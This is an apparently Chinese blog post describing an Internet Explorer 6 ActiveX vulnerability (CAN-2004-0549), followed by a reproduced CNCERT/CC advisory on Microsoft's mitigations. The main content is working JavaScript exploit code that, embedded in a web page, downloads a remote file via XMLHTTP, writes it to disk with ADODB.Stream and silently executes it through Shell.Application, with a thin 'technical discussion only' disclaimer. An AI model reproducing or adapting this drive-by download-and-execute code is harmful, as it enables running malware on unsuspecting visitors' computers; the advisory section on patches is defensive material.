ie的activeX的安全缺陷

 

因为一些个人的原因好久没有写技术的blog了
最近看到了一个可以用ie的漏洞攻击的办法。在ie 6.0上有效
挺简单的。就是在网页上嵌入一段javascript代码,如果安全权限低的话。可以从网上下载一段文件
到本地执行。。。呵呵。可是想做什么就做什么了....
关于着漏洞的介绍
http://bbs.54master.com/redirect.php?fid=14&tid=122758&goto=nextoldset
(仅是技术讨论,不应该用于其它的目的)

var  url,path;
url
= " XXXXXXXXXXXXXXXX " ; // 需要下载的文件
path = " KKKKKKKKK " ; // 保存在本地的路径

    
var  ado = (document.createElement( " object " ));
    
var  d = 1 ;
    ado.setAttribute(
" classid " , " clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 " );
    
var  e = 1 ;
    
var  xml = ado.CreateObject( " Microsoft.XMLHTTP " , "" );
    
var  ab = " Adodb. " ;
    
var  cd = " Stream " ;
    xml.Open(
" GET " ,url, 0 );
    xml.Send();
// 创建xmlhttp下载
     var  as = ado.createobject(ab + cd, "" );
    as.type
= 1 ;
    
var  n = 1 ;
    as.open();
    as.write(xml.responseBody);
    as.savetofile(path,
2 ); // 保存到硬盘
    as.close();
    
    
var  shell = ado.createobject( " Shell.Application " , "" );
    shell.ShellExecute(
" D:/Downloads/qq2006beta3_PConline.exe " , "" , "" , " open " , 0 ); // 执行保存到硬盘的文件
 另外贴一下这个漏洞补丁的发布日期:
安全公告CN-SA04-34A
发布日期:2004-7-15
安全等级:三级
公开程度:公共
更新说明:
  对于近期众所周知的IE漏洞,微软一直未提供补丁,即使在7月份最新的一批安全公告中也没有。但是,微软提供了两个更新方案能够有效降低ADODB.Stream或Shell.Application被用来运行恶意代码的危险。据分析,要成功利用IE漏洞需要IE调用ADODB.Stream或Shell.Application程序。
防止ADODB.Stream被IE调用的解决方案:
  这是一个简单的注册表修改程序,能够有效地防止Download.Ject的运行。[下载]
  另外,微软提供了Download.Ject清除工具。[下载]
防止Shell.Application被IE调用的解决方案:
  除了利用ADODB.Stream运行Download.Ject,调用Shell.Application也能获得同样的效果。因此,微软提供了Windows Shell更新方案。
   http://www.microsoft.com/china/technet/Security/bulletin/ms04-024.mspx
  上面的更新方案会更改一些系统功能,除了安全公告中提到的以外,还有以下功能更改:
   针对Internet Explorer 6 Service Pack 1,它可以防止位于Internet区的浏览用户去本机区访问下载网页。该更改能够降低潜在的新的跨域漏洞的影响,进一步加强了对Internet Explorer 6 Service Pack 1的限制。
   限制Shell Automation Service ActiveX控件(shell.application)的功能,安全性得以提高,能够防止潜在的恶意利用。微软认为其是一种深度防御措施。
  微软推荐,在XP SP2发布之前,用户使用非XP SP2版本的IE需要采取以下措施提高IE的安全性:
  1. 加固本机区(参考 http://support.microsoft.com/default.aspx?scid=KB;EN-US;833633
  2. 安装最新的Outlook Express更新(MS04-018)
  3. 使用上面的ADODB.Stream修改程序
  4. 安装安全更新(MS04-024)
参考信息:
其他信息:
  CVE编号:CAN-2004-0549
  首次发布日期:2004-7-15
  修订次数:0
安全公告文档编写:
  CNCERT/CC
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值